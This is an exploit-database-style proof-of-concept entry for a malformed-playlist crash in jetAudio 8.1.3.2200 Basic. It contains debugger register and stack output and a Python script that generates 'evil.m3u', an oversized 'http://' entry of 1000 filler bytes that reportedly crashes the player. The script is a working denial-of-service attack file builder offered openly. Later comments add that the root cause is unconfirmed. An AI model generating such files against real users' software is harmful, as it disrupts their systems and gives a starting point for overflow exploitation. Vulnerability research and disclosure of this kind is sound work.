# Exploit Title : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product : jetAudio Basic
# Date : 27.12.2014
# Exploit Author : Hadji Samir s-dz@hotmail.fr
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3.2200 Basic
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : Windows 7 x86 fr
#============================================================================================
# To reproduce: open the generated PoC file (evil.m3u) with jetAudio
# Details (debugger output at the crash):
# ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
# eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# ntdll!LdrVerifyImageMatchesChecksum+0x633:
# 76f2e60e cc int 3
#
# 0:000> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
# 0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
# 0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
# 0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#!/usr/bin/python
from struct import pack
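# Build the proof-of-concept playlist: one "http://" entry whose remainder is
# 1000 filler bytes (0x41, "A"), giving a 1007-character line. Per the header
# above, opening this file in jetAudio 8.1.3.2200 Basic crashes the player.
# NOTE(review): the filler is a uniform marker pattern only. The debugger
# output in the header shows a break-instruction exception (80000003) inside
# ntdll with unreliable stack frames, so the faulting code in the m3u parser
# is not identified by this script -- confirm the root cause before rating
# severity.
m3u = "http://%s"
buf = "\x41" * 1000
m3u %= buf

# A context manager closes the handle even if the write raises, so the file
# is never left open or partially flushed.
with open("evil.m3u", "w") as fd:
    fd.write(m3u)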